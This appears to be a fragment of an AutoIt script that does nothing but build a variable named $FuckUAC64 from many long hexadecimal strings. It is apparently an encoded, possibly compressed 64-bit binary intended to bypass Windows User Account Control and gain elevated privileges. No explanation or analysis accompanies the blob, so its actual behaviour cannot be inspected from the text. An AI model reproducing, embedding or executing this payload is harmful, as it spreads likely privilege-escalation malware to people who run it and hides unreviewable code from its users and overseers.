        $FuckUAC64 &= '0D00A00FC583E51F0378BB090C486BED72032CC14982766B545539418A033F44B69B358845083D10153CBDFF6DDBA2C0450CE9A4C56CC48A737FDCEAFB7C84A3E649113DABB64F8897BABD653B1106880A80EC0880DF458E0FC30E41D8630881F7D8B8C0D4D2A6F60F1BC9D5F5AE84BE1BD0B9AC895289E81299CEC0614D458D16A2BB952243505D912C3B1DF3D6E07B0275075240D10B037505905B6CC7084A3B10CBA66952AE3DF6166C0CEB0D2E48C7048D73C1C6524356583BC483FBBBB18B4CEF043E6A03D4B53A231F7AF026520E2F90002056672930A87B1B0D081830C35B0F41069CCF73736C73D0003999B0374B445E3D42357BBA00106A773BE1AA1B0CADB05142CD7672094449B22911963C807BECE006731AA033B2B22B03B87DB0BF04E4D21D7051084DBE59305C8F18FC5B7B2E1DDB8F642F05BF32A2DF2D992B83BA007C72C7D6F7D0977B042EA08FA587785B667B67579F0A4495D8BD4B6EAD49550B8850242275C21CD62D38100B07B61B02ADE10D231123D80C02C036D8336E4CF74CDCB3DDDDD64CD34E6D49F7D3094C8F6AC5A07E5851832525B46D5723AB9A006F0F6B70E30D160872532ED249B900E0DBDD07490FAFD11640721ECDD983E107686BA3DAF84C5A899303B3FF563563B7E03F49C1E90675390C25BA359A0703BE5466906AD010188211892FF40172457F'
        $FuckUAC64 &= '790A8811DF89AA77EF76F6C373400024024981F900D7757F176673302F89510803103740079BAE735DD803E03F06E803F0F875CEEDA8EED8EB94B2441AC3110331F75E3773043208D8043407517A3BDFE804F037D0F080C78352900D97412A79EEAAF4A5AADA984183E3F8ED2EB5F556EF0AD17413124028635028187A2B7D4C03D17468AA03C05F0063C34A8B141015AD50F89741034B08F641030FE02906A76E6D6BF46098292633CA6E62F5EA10B73A1BB733500AD8D518D1E8782CD80646D8428355A9AE2B50B850F1E8F35D03F5D58ECB75487D5058828D89C56C00DFC24DE45D6033FFC845D1D5A001B989B22A57F5D2B61DD356C18ECA40388762EB622BF44518F0C9CA6BFC0BDF40C3412BC2663BC38D58017C0244292B45137C65788BF7DA07530DBD7DD16D60DA9D8040CB51C61BD20BEEA010C4602883E2AEA8DC6811A772C84E5BAFA09DC532A2CA49134B74C6B8F0790FDA5EBE776D34287967F57202724F2E0D858D4BAE2D1DC804772A1CB5812ED10FAD770366C26CDF191EFA6BAC482BE0E27C2353D4EEF3ACC707FE1B7C11F841E2DC530AC700DDDDA0B817CCBE1023889D24A0B7622E0ADB8C9EA52B4E3AF7ED2144ED25750021741A0420510B58D827CE1FCD65863D756B3E26FC4D33F029C05F782DB19D05F874378B4D70B6E8BD3B15153BF10F8F072868102E99A310'
        $FuckUAC64 &= '3F4B93EE7527BFB447E923F86752F072E448F7F6584836104931614978D835F40A4828FB26ECD9735CDB75C703FFD86D040F790EC3106DDB3962600F3A6E8D5A6CDDEBB3915C224DCD333CB570776A2C13272CCED30A3814EF29CD0BCBAC62EE5015C21CDECEC845A3194A3FF20736097A6F2B4BF0813973B3108D0E5AC84FB54D14693A66D033CDB29C8B8B471484B88D6510F29F833E10A247708BF23EC2A95740D8B8DFB1541D825C79B8BC0734887522A41EE91C6128D616B81CB035803B85650B634C5223DD09BE2837A0C7492E5107A1CE425C836800109391007E602A4BB074947010A41824CF85E4F263403016CA0F391E8A008B756872E9DA02D83676F06CFA9106E9B42D6D2E8B702D5DD0CE212AE7932946812823A44B26A17192E046F81EFC7F98A4E90591E07758172431301E06C02230F6B11EEF54400E0F4D28A148958A8891485C901CAF62C0002F33713216DAB15B6431F84AA0B60B630915534D60DBC0160A667BB9CF16E99DF74BAB906648C70021C8729260404149F0198486C3CFC798F740E20030E330988F104AC5A46362E10832487345C0585022610FAC72605F7F6E10910E58180D70975BBC959A21F64583FC837FAC753566D18026D9E3D27C978246462F5EAA8A0C1EB9B055DD0F1E714926FFC3114DE0BF7E83FB247CC9AA36592092B9F7404B6A1777C5C363'
        $FuckUAC64 &= '8324C4F1EBDB748F3DC02FBF24E91DE896F7F7DA16B52CAE2BEDF97B8A39F7511483521771088A229C142B23D76C41A66B2FD434BB5CF8418D46D10BC687C0EAC12E77480023CF75E33100EF57B00B05763C868477B71E8BDAFF255836235588CFE0762CD9BE8C3D43A96855076AAD17766F0AC0C202C3F2B5B9ADD84EFFA61D58F37CD45FA8466A13C6EB79B9280084FA2A592C6F0FFDA01B5CD05C1758B90A60F4ECB2A7CB3A752D690B896AE7FF477512686B5B633BF6B349B32DEBE6DBD02CF7924096348A9B8C01C2EB83948B57DC530F1F05579509DB4A8CE85851DFE348C4238665F464110CDF292B8D583CB8245D72371B8D0B7642BBC17728A8FFC8AEA61AB60017EF0F45D9C86105FC2AF78903EF973A8408FB20DD1DAA40AB3A704A67F16B3A38206D70CEDC7528F0240EE2E63E1668672AF2A9154B851CD59DE858D84AEBBE25FC5B3747EC413BEC75C8F4FB48C81E4B8A10987FBDA74215CD9CE97CD9C5804C10CC826BFCDFAFDD072A39057B76762217E146809F4BB3B9271D631784FBFCFCB9C242C975C083F6E4C91664FA80D76C9819D99D182FF585F5A8CEF31C64645B9EDDA8F38C42C94BF4F475BEDFA8542CACD1D958468FD10E324D76E861F6C1CEC0D197DA3604930B8A040A98EE02DB21180F026C668B10D9DBA4EA83E802911304740D12DEE8D1D8041104EEEA05'
        $FuckUAC64 &= '7551C8950ACE0803B91F8FA70ED9F201F00D4D708AB918B54999EF63606AD9FB9E01F31466009F05BD66400F204250D41B85BB690A0852B941E04CD59CFBFE068B440AF015F864140BC076D03D13D46C1F824C224F825F15E89097F872B56D5B6B3F2F0F184F033E4016C1FC8BEA0EFE86EC505CE7B840E75267231F0C6F4C58094CE7DB7C6F0D4C0A10121849101318F37CA79E20287117E0E86DE76BB3985715F099AA20DEB6A1CEE45D4906F88A2B7B48EDFC4CC7894C19FF4828557003024DA0116108ED48EDA3A08B10104C98A4A013C92124A104A4A050C208876D1E08533801A084809D5C0700629F9E8725818AF8F01A4EF3E059A0181038140DC24BF76613081175D59E4D421721E1529F09779F84241C618B4EF3A69F820DC2E1C1369F4C6F9EE77B1E5FF8F013E8E0E8F99AEF79E0D897D04017189A1362E71099A00811900372109F5EE94E6712F559F44DBA3D52ED533A6183414D08FD1008871C72C8182028301C76D8200B1040084872C821875058602151871C68387F48D490A87A7564400E0B0B88900664400698A0A840066440B0B864400664C0C8D006644006D8E0E840066440F0F8C8805C720001081059D5800C1820304006E45B0B30386440066440485006644006707880400664408890644006649868A806644006B0B8C040066440C8D064400664A0D8E0066440'
        $FuckUAC64 &= '06E8F0F8805C7240000208C8800CC81018200CC8800C283038800CC8804048C8800CC85058600CC8800C687078800CC8808088C8800CC89098A00CC8800CA8B0B87D112C92C0FF66D506C425EB098375E926A32A1FF108116B66429A09106158B6A4999097608D6D3720076B5B5465183A13D24D481C2011122890CD84340830FE8D6926A43938F440EA66429A0948E06826A49990EE70E478BA580369DA8014CD26E4644288C0900408094FB38D094714DAA08730496346D82C32D18542EF247E0BD03543C491276D6CB0A624D8E0457FA144E5435B0341E1D718C833D24593E2073DF44B488A70AACE304A6751A9FAA9470FB7DA4A1D74AF4F5D45B8800D73BA05A87F40B8289A3F0448EB26878843F1BD681B59B0406C61C1473C7AD8DBE6DA05231804C102CB23C1C76819AC6C00EFFDFFC4667CB3CAD21B8A01428A14093AC27556576D6B0D0F844CF4F71685EDB1B6C4E65EBB8F00814A8D2245097EFB6681E2FF0F04FAF80F77CB8C8FFDE628849236BF49BAFFFE007E4C037F844AB4D27C447633C24985C374A51AB1C5C7EB1D1B78A4FF4F3482C30FB584D2742784F67423489A419AEEC1EA100B1B170F0B34CC5DCE0A04758B313CDE055A091F0248A9A8DC2DC08E21908A8CC0375FA807DBB2615D2FB890C030106DAE02177C8AA4CABA0DFDB63AD29FD14923D374C350F8865106'
        $FuckUAC64 &= 'E9066947399E2F216D547376920AB9D301919191AF8D05FEFDFCC2919191FBFAF9F8C37FEE19A140552214BF6837B9D1013A91752C1375EE9D35D0412A751FAE0F1F0CA1603818B1F1481A191805C342EE902482378F8BEDC26C75215B1641F6754CD44FF3D30A1010753D1818752E43E8D0D31320CD078F9F43EAB09B3F1B32EEEB83811A257B0E0393E363B6546DC802EFC17D5F84195F0AB47564831D6EF2B16E1FC871578C433A76CC744E734AE168476F4086D1C58450703C5E46087076116F76048CC2C16EC1EB2235487A57606B88362FD05A733F81ECD804D62502FE00304413424C31A260676B7B861BC43ED7E8744D0F0D083C270DB6A1781049C7C12CEB0823908E91CD962C5F7BDF12458488B9542DE256A2BFD163483CE5098139D02AF221470CBA0325E0DB069CF33D4C63413CE309582801940CC16901E252714014045806BC14F08D780018459D1E8B510C14BEEDB8CD720A1E03C209D0720F4182016BEF375028453BCB72E26171840580B20475280A5355A2D68296A44B349E357043ECD4224D2B0ED011591C8DBFC4290D6E24C1E81FF7D03181139DA8019B5347050D1529A101B7DE148F828D5F030A3B1D85ADEE7D652C3DD5E64863F3699D71F0CF50EA47377669F0F6B18374D56E08DD5F889B4906FFC7302483FB147C312C3CAB5C943B25F20FA6DED96F370D0D27'
        $FuckUAC64 &= '14F1648DB87123DC1D170F19F30009EB8F043E1111403E8BC79402D385ADAB202E6AB7286E20D924038E3FF70D12F45B3D0CFD8B392B79107B06BA2CC52D8B5C5310088D0BDF057875D03BC775084318CC5AEAEDC2790F07FD8909EB07838C206CFC44094D9783630829C609A1384228890BE3B6AA64548F3C0A7851078BB45B24B75035451CDDF720AA8E70B55F0079B2CBC1467412AA76B033C03903480270A774B5AA08017D8D801EA4A1D1824E33DB41BA0E8EE02685FFAB688D72E3B22C1B3646E389DF9B4AE056D170D3687BE0F642895E1964E1742D381FBFA2E0D5EF0D68333F017512ACD8415E88762F6823FFC67E24EBB2ED75167463761AC5021C9844FF8E19080CBBCF4314E24BF80AC756212CA1F253A42338617B552DFEAB50CFD8AB9EA658605FC12C7E4241842993F9FE750DA12B3823BB092A424F14BB3271782EF77173269DDC01FC9115D49826C183E1C902F68DDF5504C20FBE440865E040EB123EF086718034CD5FE30081E29E93032E5D11B06A1C8B7F20CF80305427754773963AC321304C12FA9CF1E3516D20C35E5A9F4CEEA960E38D5481A931A2018A6C1FF1351ACFE8DD3637AC280C07C9D8BCFB05A054AD8A0E962FFC1BED5FC76BDB584D031CDC8AF6DD418A4338247FB2651F6AB8D05E43455203B992AB0131A05B8590241383E5C5D85F369DED2CDCF645'
        $FuckUAC64 &= '0880475AF8C243F0C9243D440FCE41B80590A31A4F547C6C9C83B2EDD88D1DE9288339A67E3E2E6C256029FAFF4F0878E30FD07840BF10C08B070FB608C6640A1636AB0EC54D04445340D91C7918A0BD5DC16E5373C53B3D7CC77D4075B41F6C944FCAFE89061B26A5D95EC8478C31EB151647C0B7A9B99747C0780F56169F0702348360E7DC0B539E56778805A72259D03674024E15936C3DC525E2401B876EBF0AA00F6E8DAD0BA4093216035D09ABD93808EB04BD21A0B791A07115C9D6390D8C654034502FD9C34B41048160846640ADAABA6650F59FD80A3713730E443822752515B80D7E39046679214F044DD36CC9606870780006820801B67F5920380BB94C453963147523ADA1D045CA065400034A08154FD565F85CF0F0A8B60F2ABFAD1D0FB523D55978E0D06033251BAE68A34C38897D3CF99C89F8D2017EA33BF17C2BA6C0DDA242D4522D51BA09C343A8475508EF311AE02D34D44DB51282813C8117AAAD6C72DE6701748320F8BD581084625F35CC20BD4BC7E90F892A703153CAA995237DA6781681F783418D47B6C74EAAC784E0868B48048965063E5661055F70EBA6938C880F134B79F4D31F67100CE444AFB654136C057E88CE42153322DE9F59250080CF71965A18858A400BB295141B49601D091023F995ECA00B4AAC43C4A883758F683B3B0AA88607028B95E216C4'
        $FuckUAC64 &= 'C8201E210ABB27806601A9B7073884CC32D0A306B4353A0C36754DC90D47D557106D661A8B7483B0215332FD08400EAC7FF6471882755F143C358A0FE42F8D35524DD2B60C616E4CDE804C3856ED5DE5DE7C720824823C59DCD7C805FFBA6F180D817F2434A06D53B56E21121595F708CA707D3F45B92A44C189A70F1E71A30C5450D84AEB14160816381BD610700940384ADC2C836782173009622100CF24479C558188483D28097C78FFD1EB4A8520FF7E049F8EBFD13F2EB0F091766EC9023F0E0DE906C7CCC9C9EAEBEC1F8B0D8704B99FD9FF253A3C0B745734214422305E974AB82A8CAA9883EACFB73B02C163BD087462044D58C02F2F2F03745304742E067416FFCA0E5A23A1D6FEE847745DB3BD616F765AE946CB125EE7A4DB9C57EB7C0F463F0CE2A4826CBCF0AE2D9255BC64E6E21A2AB6DB16873F093959781315F014E0E3AEE04E5803B1D0C2D1E80E73051B043BFA26028F8D615A2CB991DD160D206DC890C106A00BEF516BE84C2A2D0EC08B664D3F45BB1A94BAE8754D3A0AAC7EB645912A048B084BB78533A231FBFD11040B747657A3950C622CD428EB2C06772C1EC0BEA55C83A60BED8A8DDD002975135DB64BC78686EA10F1058CE3AA7005DDBE601C398BA53E3B29B784099AA59D0B61A76A447C3BD17D2A90B523E211A0865864C80894D1663341D93074EBD3E936'
        $FuckUAC64 &= '021E22CC2499076257D1C5B0BF163BDFB654E3DD818B966BEB5FD56C2BD05C8BDE061597B26B854EE6098764A8AFC60ACCDC2E0EA9A5E998C5F3F10B9F6870EA991D4920C84EAD8F112DA391073F6A0462B39F8FD62B4A108809748FFB0807BAFC55842497CA8D4A18E486819A13DD612B17A03376BA9106AB1E058DC90C4047D1061D4323D501466B56AEF161B3B9552C30287391452BE440BC91EEE00F5B35631BC18EBA513BC40266767649C1ACE3C62BFC236F080708135EB6A75217806027F0C57355E11BF0203707480F42D09EC5B3AE5A02C311234B34ED87E0A330B51AAB8D56201B8A2E37E4D672491990C1639F8897528D1CF88A7F2ADAD85D64DB1C8824CE0F6F1F4BF7464EB6081C62B3DE51CBB22266D434D2145DD684C3059C43651E05DBABF27303FFE3A321051C67300CD838C9A6503A694841F74CBD8B710AC650BB391DE38DDAF5E310551767C77113454F20B22BF8E52A7B689E2B4F2E511CEA4401291846B6F325119F21B8CECE06FBEDCC8E8D44D828317F1F80E490914976B85F0F1999E4405E983F2939E0750FCDD81855AD1573C816D92EF943477017BE8E68B62428EBD01F080ED5338069169F3D631D6BDA32624C215D321C2923FD591859BE8C6AF00CE0C3F63811DF9D6837FFD6062AC13A109D96DA0CF44063C93571C3DEF54571D4F228018DE8F68AAE7F36'
        $FuckUAC64 &= '43373DED15F853913BCF7434822FE26CA1B66AD09641BA13D11F20781395347351410D23100CF2B95A498C7B28449D62ADE8DE1E225A95A1241F1C4863AA827418465BA343AD47E4E8050FB1020D75D409F11DA711C0E2513D30BBBF8952B6540C2133CF1127D701E4AAF623F1352CBD0135D17E11EBCD2FC8A0ADA512E727428601E77B0439427324E9563C9D9D105522F9A85D6E8D61C0AD6B69BAD04DAFEB9ED98675043020202F99BD10F09E17121C4E19EBE800A430F7A31C09A2EECDD4ADCA02C2496F274D2BDA94234696E502664313C22FB10DA88BBFE9EB284C2BD143E11AF3886646B6031BC30AB57EB8EEEB6FE471041B1B70FD695E5E8ADEC6520B7A5C51FE1850EB900CD17DC985D2E9228827A877AFD1535BFFC4F4482BC19170A219435473736A2E421859C2C76F6F5D45FF5120B2027E0D0403751680D9BA1BE518791E2107106B65C0B7AA0A0D133E2856202514D7CC45B8E522F1E0777C28BCF445F9115488ED8325870DAD64BA948CE61E24003FE45673E5F737B526752C3905332A03C5AF896CE025045BB818D5A5ABEBB1ADDCB20A33F712254A686004473B511B21C52FC4941ADF5B8E14244CD74D6FA4051A8D520A0174BC0077C5DBD3659C1C2510243BD373DD00FC4B6881E200F04D8D9B7D41C6039DE90AF11575BD3B8B6810D96A60044FF3D8354844C3CF1DFF'
        $FuckUAC64 &= 'F1B71646D04473F14E0FAFF8E072C2F9B83DFF44F8B6FF571D6C58511820DF85F550093F56C185219325C02D833D8F88C0419686001F19CF75CB30F97E370DB2C70353EBAA0C06EA484808BBBBDA1F81A141960A3659EBED08148F6A3941EB5C8733986996FA4357A2DB24173E5CD890ACCBB705256D409ACB6FF787502B4205A984F7FBE076BD11A397BDE42425D022EBD518B78FEA6120FABB2B145D2F43D10A82010137F17AD3857F72EEF319D18880E745BA3EE247C614DC0BC7EB46233AFC20DC23CAAE85871C74B70746C28658D1790546EB09756E51BB4B288F12B6ADC0636C03189BC76FB8840490933C99B2250194878BB70B046626B683614DEBF00C8048009CF503F94E726D8CEBD66738112F8C8220EFD0E57811B10BED301B5828B483DC28F56861201A0905B0C345B5BEEA21B088ADA09BFB459280F5F7F175A6041F91D0213808416C5B2C2339FB02E3C56F02BA3B2A8625FC054183E71FF4BF81326CB7504D6BFF58418A740F38816BFF7FE9604002F640D0FE4080FE02D9050617BEB0EC09B3C6F7D0A8AE9A41FDAA5AA3F40F0820E04FDB02C47B58E70276B0E6DCEEE6E81E721A64C5815C04E02E740077880795160A318A06B3B148B2881E0BD17BEA059B85FB1489830FA66166E30F94C3376F4C1B35986DF6094084F60C1A4C015859C111B02BDD1E0519E0852FDF11'
        $FuckUAC64 &= '228571518A0B1480F90ACB48D7B5E31F4C8A3A1483A6A006D17C178D92F60171E1174C88E461412188254DFF33DB601A649860EB490FBEC90E60DF22D89ABC3465C67E4903C54817D17555198E5FDAD9E02B14B33A60296CD936E833B071FB480F1C1B0150842C36292035F182228246D45C2C7854AE227DDB4D8E68C14255C742AE503CAB704A991221A198B5C038CB422AFAA00FDF41203D5D8499C8CB0FB1A6C058C044458BC452E30562922004D72BFD033885774390FD580F8C480EC60C060A1ECEFC58CB76E89AC95309C6970D93582DB9CD16DB5BF61F09683BDB47580152FF3544438B7AA4637A390102751EE062836A4450B80A98AA855765E798C4B8E60CD051B74C33062EFBE355033A705454663B2E03A041B4756715BEEC8D01BD2141BC0D24663A228262CF0D7278CA77BC1560152AC67326F46FC48A855D77537B153983B2C7CCE241ECE95D28DB0F4C0804660750CA96C5BADBAE4C2974FDD30A1E0ED80C9E1D2D8215A8C9FB820C185F3C790F752FE6E57122F8C138730A8375658D530D0803F0F6AB35B5200641B7B871E6258E277504248EC43C8B55708B0A7888164B02C416DF66C188060A8191136CAEA50AC313211A3F8568880BED4B852BC0CC509C0A465EE90D7382C1A2DB4304079D909E482F951A965C38965F1EED4833511BC148C2F0660E87AE1D5A88A7DF97'
        $FuckUAC64 &= 'BA4D21B601669C15724BF883582CC9D8D4EC28D66C39174732CFD7D70232B4563CE075F4DBB0B6C866805503C112065E214FF70EE1FEC391811E91BC4A7D1D7322E9359245D7CA1FA390CB4AD05CD12FC43BEBB80C6D01CAC203909ABB592BCEFAA806C6D12767FA34CD702B8B06C703E252B955616EE9FDCDC3BA0ADA65C5C8B1D493E749DC351DF87525DEED24751B44DE63CE2C940D2DF8261B96D0C720708023605BB1B04D170D0841C6671C7F037E15DB0B0344443BFE7FB8EBABFACE8D08D1381B0E158B18591E5EF010FDFEFB031F5A4463C4F075A0671716BD445CFC05754BA9D0F0B96D8A89D26EDD4EE91AEBC9566365E195C57C8245ABCA5C722199E31B8B1B8B6201ACA432F03F1B988710E5AB7F19C1B0DF6F2340B141807D001A366EBA79315638641C83033A2BE41241C10F005B201AC44A3E27881B301BA2C092E0C621F6B0175A783CE253F9ACFE75185F2FD46FD9EC6A769AD8733B3D622B41CBE77E6B7F31EF6C85BB5D2AFD05E835F4124D48FA42C4B64BBDEEA2180883E16BEF11DAB645D48A4C9015D214C3B1875B12114412D4186E703115EA4642165278838C956D409C39F4F31B8E16742DA9C58C58120D1B2C4A0B18DFC50B1BECDBD510CD7776DF3C5BD7B8880766D1157D488BF748C124CB259BFE252249F463676FC85715D12B128914657882D849DA84E182'
        $FuckUAC64 &= '73C35410D818C961CB82D13C152C83E38BCE107613DB50E30C3B052CC7D893851C2D49E1EAD5DA06F64BD15318EAF6C2827519653B0855000CD179041D9A41AA4653AB22E0B17D6B853713C219897B08071085B881FA68787BE283E2FE9AEDAE00B489525B1B83E0EF900C8A33E8028943B42FA030285A05DA9CF0C5013A0BD6EE7503F0834CC6DEF743C9D106E0B15EDC8B2BC12B6BBB3767A84B2064612483E85B088546C4B1EDED7E19D2C53F75D0B3DEFE83FB5783CA2082ACC283FEFF742304FE741EA88386211B42B97FAD025635AE512250A3B2E9C2EB0743176677A33A48D38617CE8848195B749D9FE077BEB9208DBDE1DC8917A8BF547ADAE960233C487E3BFDFA2DC29000BAF2C4E28F65798006E310182E61486DA84817914B46215946C117763443427B7A901B8FE2C191912383C17A0AE107722A904B7A6D01960B8427FFC88EC94B0239807C7954F07A26E044F288647950A8845B17808AA388010BBD0190B7841019308A290FB6A6E90070262B384062D5909048C14C3DC5001AA9AD60C3A1203252AA75F9C5BF63F521111C7B680D038309FF16EC8A4AFCB276159F0841B757EB640455406F3F43D0724C4170947BD2E2055B40F23808414D7183A8764A321245860734C60D561D28B6A47A95350A2121A821238B253B701845D660A7490FF6D8E6307529318D5F22904038'
        $FuckUAC64 &= '7D6A09F9549B7B000FBC3212182D2C01627F975423E1D7A1E90F83652842C16D472A4B04D14528A652AD7562A0F5C8681804271AD113DFD947E2B0153C13837D28F14564A126E0B601CB9D1CF31335590864B37A17FB5122B790872D997B000F05342C20238EE8E9B9197AA8B9A3E9AE0C78060FE354BB555320BEDD88B0EA7063C1D4D8C745E050AA1B00A6895DE40421B0502709D0DC38FCE89F407B839B13FE83843B051678054F7407F50B4806F8BEC15F2E7E0373C1FF0583E61FBA8CF9200580376E1416D4F658A63108A8C5C6B89D8E2B81FB301762C2C62093601696BDE72604EED1B12980A835072F1B55DFD7D1448A6C316E044502EDA0FE56C441D090BECD44886D601FD0D4360E1403AFC34BA8C16ED0067DFEA5EB600F3CD2ADF498D1EB41CE2C42D8C44A304C5D183116A81B4AD050D818B2E4081E4886A0B23B1B8701D62C72DD88C8D642D28426304081D996860C2AD6960ABFC1AFB5D53029B97E97E73009413AC86CABF7660CCE07270E33F67F53356A4103DA498D5601458D60F7C6A61BF6B73A094584ED7462204039544B76C77451324D880A37338DDA4EB7D7C232F821808592E619B02E333A1D1943F8DCD930F93A333A96A9DA456FD54DDC44250C311B5B00833C5F1383AA55EFDD0885DC75E845243BD00F870A3BDDCB0B0A0521714403E25DF8F4F8556EEC8033'
        $FuckUAC64 &= '268D028187CD05706BAF0D0D3E0A321EAB167DFB04EB05806406FB4963C4A2E310B4507DEE4903C633E84230019E78804584238A6A97EF3C1A4A803AC44147B705F084ECE9111AF15F782B50E82833E873173645018038A976556C5D0627EB7E8E0286745F2214D9F8E662C05BF158DA5A44E38F3D2C0E7B126671100966397DFAC0CAEEDC7461D74970D448741AB6610B5F6F580A741F352359A158FFD7F817423109EB3B493BDE701E7505C6030AEB2BC330091C30A0D834052EBB171C55F36F740FCF7573CE740AE84BD3C46DE84D38B03F2B7F30EB1F72402FFB42ECB0D2090BFEA1E3452BE64C84068C7460010A26B46C57E0E0DB1BCBF603809A8ADD174EF5811FBA314FFA047F179D72F81728B81220F8F8034238BC00A0F2BD4B6FA59138B60B423384010D8FC920D4F913532AF8AE8A2DE229FFC0B8081CBA0B61A103815D0E3B6A886F08BF39D762027C118A031315F24DC9E544313903753A492B100761C3131FF7DA2163D2F056178EDD45E4B86D5039DED1E8920B8800AFE7767641D3ABD8606CA47D1006296E4F75150CC00EF6F05CE8E0C1AE2D3BC352485A8D6E855B0FB64AAC400F95CB03E4EE4E1BB10603238BBA9C2013C937906641391660027410E48320A100AF8BC6768C9382FE3F3B94FF3B1E4F411202799782F2E6C31434608B981A3CDD0B04CC1075091E04B239'
        $FuckUAC64 &= '1992679B82EAD8023272309E499CDE0F0E731C8BDCD47F5782DEA080D891EC18DEA4A46D3BDD369AB8B574527440C42338D801D91EC36BAA0ED9FBB8F5B0393B885408EB4CC5103FDC7043254013EB37AA48C7C26291061E0B0003221CF698E97D266916EB0C13127F3A0EEE7714D76081C1EB2213264C200C5242F51F8619DAC0064D3BF5740802D5815ADD497E892E96887ADC4059292593C073C90C05AF09DCEAEDC90580AC1F6D750485EBB5B044B1601F14551A4C5874616309C658025A4C02DD5B362C8913CBE3282549E20C02E5EA1BFEC92FE4DB891884B033DB84993B3DFA7003DCB6770B39E702F7491E1B4157F03D037171E43FE49E05D800F1F742202069839E5023644B0F961687A885D5F9F02CC48600443A5A2060F91C0617D57C8C151D0890926A321A40CA8085581501491A5C701E20057589207FD6A064052529E8E1225053863A159A9D08415D69520AEE0C0453EFE14C3310E2248CC3A83A8A5548F17BBF67008362BC3F0AB9E00EA20600FECCF6055D5E1B1450D4D084984640042788B3980221480E8B3866E31991AA6154A587C9138ACCA06CC3830CC180193057E486A8BC75050A5930055F6F069528443CED5D2588FFA9EAB8B88F3BF9751DF6406044206225A62EA7B045312B6F3B461EC8410E18CE530A090A144DF02C1F2C4C2ECF76E50A4C494800EF6EF0AE'
        $FuckUAC64 &= 'E02180CA5342C64419DC2C68A224C00CE5CB828015E13BB46181E94AA7D9317D01945F0E870A653B1D696E3C0916A8B5EAF3AB766EF233C8B2E7FF38378BCBEAC8D60214120B859CAF4501EBCE0E5FC9188051D2056FC761A819CB034F6CAA2BA8DB4D74220808FB49D156502C16FCF702381CCE24F52C3B54A347148C338BEC0A4303C0D75C36A4EB809A440CD61C112EA43E41EBFF6EB9EB2512334E43C4B3485140AD230B9D8574D98D206444AAE92C1323F69423783338DD1B7A016B30DED7D3306C0A678E21973C44D0B7EF9579F634182E13670D08883A58230996EBC98BC86CF8D1C3F3FB6C3EAE6E301948920808CC110901723D6F965F1E91778915763B3D6F6C6EC904F2407C6C48880D964C120A48B0AC2BD9781748622346180DF81C0A7B9B6CD50A936CB77D0268BE713B0DB76B69902DCB78AE9EC30BBBB35DB7093A6B612928A2458745BC547118FFC73D8346BA325035302735160B6E708A681BFE79B9F5660760FE0605B9F66A920890C27173423B0C036A4E218744247F6CDD01EC237615E3EB4DBA31C865692EFC6A29D10D10B9E249F0C283E2E2D258A842095DB3B910060A102D0C2054BDC9A3567C968560AAD5E3FCA66AEB27E08034E68C837C33F28CCD207E75348D4F09900F1A41832C15B933AF56E2ADA00A06D223FAF21C05110CE8B90AD364B6DDCD61470CE6'
        $FuckUAC64 &= '2B19102640500B21A0E54179F698D01E48CBABF11E6AAE81DD00461010820047042E1274BA483C0434AA3BB054B8D63954953168B751CBBA0D4044CBE009FEA0F1D6055258E1480A4C36CD37EC41582916712BBC044929DF04E019D9CA6D631405051680A111168057FCD896B66E51C8F206E0510208E90B1744AB612388897A4351158D5CC2042AB6A543417E051B0255A41AD82A1FC3B5026D025A6C7523C2E3E2FB6C5B475409B21329CF46C4C0D621041D1D3BD0301842526C31174341C80266CF2523468A02EA90BCC90AA03DDC90327345C95CA226FFA950A564778B081D36640AB9B224B51A0C04D84BD9359A3AEC4218E283BD8096B90823158F0D29B2B6526EB8902D33056164D8DC1B192EFE8138B2FD94C18B01DC2B6CCAA60162634D0696F0E126F315CC69F314CA3DE213D9CA6C4A837D600089486087C51D629D8003D8E14D30985804B6941918401A184B5A2003508538BB6C64BDC23073404A1E5C896FC8B430515436583C00004F9E3C3B128C071F4465502FC0D6931748F68B5C2024166F3F7951E3E0E4804800013A006D64906E330573010064930D761B2C6B004D01201179D9C8D8600100172F2F112FC867BA13500741DBB26E7397440063036762057217B91B407E4E006F00764F2D74006F1B99EB2653077011296335639B7B75006703B9740F4A6C26E9269B870F'
        $FuckUAC64 &= '6E2F007072F399EB3B69230F4D0061630068C25ED70D462B621175174761B365666115CFBF366CD8B0AFA7978F929D0D1B876F7987DFB061C37F77674761976CD6754F751B64319FBD907DEEB21354B92573276D217BDD574F64F9192F75BA65DD84134DBF6E21777561C35EC80F87776F366CD8B05F4F473F64FC466F07243A6D6D3A7350D37DCDDD64002C204D2008790000E8385BB60F2F2F0C502E417B32FEC132446563656D6265104E6F760F0FFBF7094F63746F0E536570741841752374EFEE677573AC4A756C4F076EF841ED93F0F77072696C6B617263E7656272750F7BEF3D09304A616E0E776B5FD7BDF7DE5B534F4B3F794BDC6FEFBD473F33236174757264186D0FB3F6536609176816730356DE920D8C57656410546E76ECB3750D4D6F6E145375074FBDF7DE7B473F3327231FFFFFFF8F370102030405060708090A0B0C0D0E0F101112131415161718191A1BFFFFFFFF1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3BAAFFFFFF3C3D3E3F404142434445464748494A4B4C4D4E4F5051525354FDFFFFDF3C58595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F7071F8FFFFADC5E0767778797A7B7C7D7E7F00436F724578697450726FA363E9509FDD8D73F96F1D648C8EAE65012E136CEF726CA4AE6374336D1720B1722783B151'
        $FuckUAC64 &= '6C20C7B20A8F4C6103734D3B5301231D85B0A68F4F4963471D09EC753C874F7B4125239FBBD046B836F1003301112DF535CB75234195474F2034DD7B8D652041A74B534CB1B1B1CFD5641366536D2B5911E8BA68D17309612D8D35DD03AF6F1B75F5696796453ED70D6E21FD764B9A35DDFB1F69191F6C7A27BA2F59773D9F545F27641F637BB9C1466573206D571FEE8B3D30876F751B700162DD807C51632E1949E5DC17EBCE556D15730F296B575EB1EFCDBBD79D7269B125FB9EFB236FF9BBA96CD9389C4B789F272D4BE6A07B1D53131B280B15B28F08DD6C4D293D096393130807424F61296EDE8CF778A341353305EF406CC23944933D97B949A6842EEF326E31D77587F7CD65093DEB2061703B66DD6C4263DF5D4F6FED58C25912A9196D51250746C27B5F3101E14A08F76577906C10BA4347549F72194118DF9B6975A72E1F659323213730930843D8843FC1640FE921C943320038FD6125EF104A18650D0BA78884237B534F37CF2119496F77E97708901C606F36261922FBB5646F35704ED77D11B157762F724375F696B492499B3BBF7B032443345F551187646FAC78B92FB10DB96CAC6C08C5BFFD3949CF4D24EF6F6D7FDFF61D08766F1F15E7635725E4C8425F38653C0EEF95510B853B1CD90883274F37BE2030946D05FB68854DD6E74B5D64236B67962039233F3169F60E'
